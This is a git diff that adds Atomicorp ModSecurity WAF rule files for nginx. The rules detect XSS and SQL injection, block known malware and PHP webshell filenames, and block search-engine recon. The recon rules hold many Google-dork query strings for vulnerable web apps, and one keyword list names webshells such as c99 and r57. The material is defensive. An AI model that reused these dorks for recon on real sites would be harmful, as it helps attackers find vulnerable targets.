+#SecAction "phase:1,t:none,pass,nolog,noauditlog,initcol:global=global,initcol:ip=%{remote_addr}"
+#
+
+SecRule REQUEST_URI "@detectXSS" "phase:2,deny,status:403,t:none,capture,id:301010,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: (Paranoid Extra Ruleset) Possible XSS injection attack in URL',auditlog,log,logdata:'%{TX.0}'"
+
+SecRule REQUEST_URI "@detectSQLi" "phase:2,deny,status:403,t:none,multimatch,capture,id:301011,rev:3,severity:2,msg:'Atomicorp.com WAF Rules:  (Paranoid Extra Ruleset) Possible SQL injection attack in URL',auditlog,log,logdata:'%{TX.0},%{matched_var_name}',tag:'SQLi'"
\ No newline at end of file
diff --git a/nginx-waf/51_asl_rootkits.conf b/nginx-waf/51_asl_rootkits.conf
new file mode 100644
index 0000000..68ecc9d
--- /dev/null
+++ b/nginx-waf/51_asl_rootkits.conf
@@ -0,0 +1,45 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Known rootkits, remote toolkits, etc. signatures for modsec 2.x
+#
+# Copyright 2005-2016 by Atomicorp, Inc., all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is
+# prohibited unless prior written permission is obtained from the
+# copyright holder.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+
+
+#Master list of known malware script file names
+SecRule REQUEST_URI "(?:ogg|gopher|zlib|(?:ht|f)tps?)\:/" "phase:2,chain,capture,log,auditlog,t:none,t:urlDecodeUni,t:replaceNulls,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,id:390500,rev:2,severity:2,msg:'Atomicorp.com Malware Script Blacklist: Possible Malware Script detected in URL',logdata:'%{TX.0}'"
+SecRule REQUEST_URI "@pmFromFile malware_names.txt"
+
+SecRule SERVER_PORT "@streq 30000" "phase:2,id:337852,pass,t:none,nolog,noauditlog,skipAfter:END_ROOTKIT_FINAL_2"
+
+#default is to trick them with a 404
+SecRule REQUEST_FILENAME "@pmFromFile malware_names.txt" "phase:2,chain,log,auditlog,deny,status:404,capture,t:none,t:urlDecodeUni,t:normalisePath,id:390501,rev:4,severity:2,msg:'Atomicorp.com Malware Script Blacklist: Known Malware detected in Request Filename',logdata:'%{TX.0}'"
+SecRule REQUEST_METHOD "(?:POST|GET)" "t:none,chain"
+SecRule REQUEST_FILENAME "!@rx ^/.well-known/acme-challenge/" "t:none"
+
+SecMarker END_ROOTKIT_FINAL_2
diff --git a/nginx-waf/51_asl_wordpress_extra.conf b/nginx-waf/51_asl_wordpress_extra.conf
new file mode 100644
index 0000000..9b0148f
--- /dev/null
+++ b/nginx-waf/51_asl_wordpress_extra.conf
@@ -0,0 +1,36 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Known rootkits, remote toolkits, etc. signatures for modsec 2.x
+#
+# Copyright 2024 by Atomicorp, Inc., all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is
+# prohibited unless prior written permission is obtained from the
+# copyright holder.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+
+SecRule REQUEST_URI "/wp-content/uploads/" \
+    "phase:2,id:333149,rev:21,severity:2,deny,status:403,t:none,t:urlDecodeUni,t:lowercase,chain,msg:'Atomicorp.com WAF Rules: Possible PHP webshell detected and blocked'"
+    SecRule REQUEST_FILENAME "\.php$" "t:none,t:urlDecodeUni,t:lowercase,chain"
+    SecRule REQUEST_FILENAME "!@rx /index\.php$" "t:none,t:urlDecodeUni,t:lowercase"
diff --git a/nginx-waf/60_asl_recons.conf b/nginx-waf/60_asl_recons.conf
new file mode 100644
index 0000000..3024340
--- /dev/null
+++ b/nginx-waf/60_asl_recons.conf
@@ -0,0 +1,1506 @@
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Search Engine Recon/Search Engine Hacks Security Rules for modsec 2.x
+#
+# Created by Prometheus Global (http://www.prometheus-group.com)
+# Copyright 2005-2019 by Atomicorp, Inc., all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+# Distribution of this work or derivative of this work in any form is
+# prohibited unless prior written permission is obtained from the
+# copyright holder.
+#
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+
+
+# Note: For modsecurity 2.5 and above only
+# Use 404 for these rules to trick attackers and search engines
+# TODO - dont check internal referrers
+SecDefaultAction "log,deny,auditlog,phase:2,status:404"
+
+SecRule REQUEST_HEADERS:Referer "@pm power /index.php index.php? phpmyexplorer inurl: intitle: intext: inbody: insite: administrator phpwebthings driven 1999-2004 wpceasy exploit running version display_blog.php copyright phpsurveyor php-zeronet based zero duware webcalendar webwizguestbook_license.asp contentid details.php ebliteck script.canavari.com snipe.net reserved glfusion project postnuke option= flatnuke website crew flatnuke md-pro manager cmp-noticias downloader management warning pages.php error password passwd ora- wp-db-backup incorrect unexpected illegal valid sql unclosed problem allowed cgi-telnet unit-x c99 safe_mode r57 phpinfo locus c100 haxplorer danyliw transcoder.cgi phpshell zabbix"         "t:none,t:urlDecodeUni,t:htmlEntityDecode,id:333926,phase:2,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:333787,t:none,pass,nolog,noauditlog,skipAfter:END_RECON_CHECKS"
+
+SecRule REQUEST_HEADERS:Referer "@pm index.php?id= index.php?option= transcoder.cgi pages.php zabbix"         "t:none,t:urlDecodeUni,t:htmlEntityDecode,id:333927,phase:2,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:333788,t:none,pass,nolog,noauditlog,skipAfter:END_RECON_CHECKS_BASIC"
+SecRule REQUEST_HEADERS:Referer   "zabbix 1\.8\.4 copyright 2001-2010 by sia zabbix" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:373169,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:cgi transcoder\.cgi" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372169,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "inurl:index\.php\?id=cmp-noticias" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372241,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:index\.php\?option=com_(?:ezine|mambads|is|vr|altas|rwcards|resman|expose|qcontacts|swmenupro|sef)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372331,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by drake cms inurl:index\.php\?option=guestbook" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372365,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:pages\.php\?id= ?multi vendor mall" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372746,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by phpcms" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372747,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecMarker END_RECON_CHECKS_BASIC
+
+#inurl
+SecRule REQUEST_HEADERS:Referer "inurl:"         "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:333928,phase:2,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:333789,t:none,pass,nolog,noauditlog,skipAfter:END_RECON_CHECKS_INURL"
+
+#inurl:option=com_media
+SecRule REQUEST_HEADERS:Referer   "inurl\: ?option=com_media" "deny,status:403,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:376425,rev:1,severity:2,msg:'Atomicorp.com WAF Rules:  Joomla Media Manager File Upload Bypass Recon Attempt'"
+
+#inurl:wp-content/plugins/w3tc/dbcache
+SecRule REQUEST_HEADERS:Referer   "inurl\: ?wp-content/(?:plugins/(?:w3tc/dbcache|dbcache)|w3tc/dbcache)" "deny,log,auditlog,status:403,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:376415,rev:1,severity:2,msg:'Atomicorp.com WAF Rules:  W3TC Total Cache Recon Attempt'"
+
+# Google Dork: inurl:"plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/"
+SecRule REQUEST_HEADERS:Referer   "inurl:.*plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/" "deny,log,auditlog,status:403,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:376315,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Deans with pwwangs code plugin Recon Attempt'"
+
+SecRule REQUEST_HEADERS:Referer "@pm php shtml"         "t:none,t:urlDecodeUni,t:htmlEntityDecode,id:333929,phase:2,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:333790,t:none,pass,nolog,noauditlog,skipAfter:END_RECON_CHECKS_INURL_PHP"
+
+SecRule REQUEST_HEADERS:Referer "@pm inurl:index.php /index.php index.php? wp-db-backup.php i_index.shtml phpmyexplorer /connector.php /upload.php"         "t:none,t:urlDecodeUni,t:htmlEntityDecode,id:333930,phase:2,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:323791,t:none,pass,nolog,noauditlog,skipAfter:END_RECON_CHECKS_INDEX_PHP"
+
+SecRule REQUEST_HEADERS:Referer   "inurl.*/connectors/php/(?:connector|upload)\.php " "deny,log,auditlog,status:403,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:376314,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: FCKeditor Vulnerable Upload Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:php advanced transfer \(inurl:index\.php \| inurl:showrecent\.php \)" "deny,log,auditlog,status:403,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371314,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:textpattern/index\.php" "deny,log,auditlog,status:403,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371761,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:imp inurl:imp/index\.php3" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371689,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:phpmyexplorer inurl:index\.php -cvs" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371320,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:index\.php\?pagedb=rss" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371983,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/counter/index\.php intitle:\+phpcounter 7\.\*" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371918,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:typo3/index\.php\?u= -demo" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371853,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "i_index\.shtml ready" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371545,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:index\.php\?edicion_id=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372593,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:index\.php\?module=pnflashgames" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372528,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:lists/\?p=subscribe \| inurl:lists/index\.php\?p=subscribe" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372320,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:index\.php\?name=pnphpbb2" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372341,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:phpwcms/index\.php\?id=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372328,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:modules/articles/index\.php\?cat_id=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372431,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "mumbo jumbo media.*inurl:index\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372587,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:index\.php\?menu=showcat=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372619,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:index\.php\?css=mid=art=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372633,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:index\.php\?mod=archives" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372732,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "site designed and built by powder blue\. inurl:index\.php\?id_page=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372750,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:article\.download\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372753,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_mojo" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372754,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:index\.php\?option=com_(?:paxgallery|ice|joomlaconnect_be|races|akobook|lowcosthotels|lqm showresults|annuaire|doqment|catalogue|storedirectory|competitions|jeajaxeventcalendar|ponygallery|flexicontent|jombib|liveticker)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372658,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:index\.php\?title=gamepage" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372766,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:index\.php\?myplantid=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372797,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:index\.php\?menu=adorder" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372824,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_dbquery or index\.php\?option=com_dbquery" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372862,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:php advanced transfer .*inurl:(?:index|showrecent)\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:321314,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:phpmyexplorer inurl:index\.php -cvs" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:321320,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/gadmin/index\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372240,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:index\.php\?db=information_schema" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372246,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:index\.php\?ind=blog" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372276,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:index\.php site=sglinks" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372007,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:index\.php\?module=ew_filemanager" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372008,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "plugins/wp-db-backup/wp-db-backup\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371172,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:buyer/index\.php\?productid=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372850,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+
+SecMarker END_RECON_CHECKS_INDEX_PHP
+
+
+SecRule REQUEST_HEADERS:Referer   "inurl:prog\.php\?dwkodu=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372715,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:contentpage\.php\?id= or inurl:displayresource\.php\?id= and in(?:text|body):website by mile high creative" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372724,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:ratelink\.php\?lnkid=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372779,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:main_forum\.php\?cat=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372790,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:article\.download\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372755,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/cms/page\.php\?p=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372764,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:php/showcontent\.php\?linkid=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372840,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:php inurl:hlstats in(?:text|body):server username" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371008,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:wordpress › setup configuration file.*inurl:setup-config" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371016,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:phporacleadmin/php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371025,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:php inurl:logging\.php discuz error" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371196,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
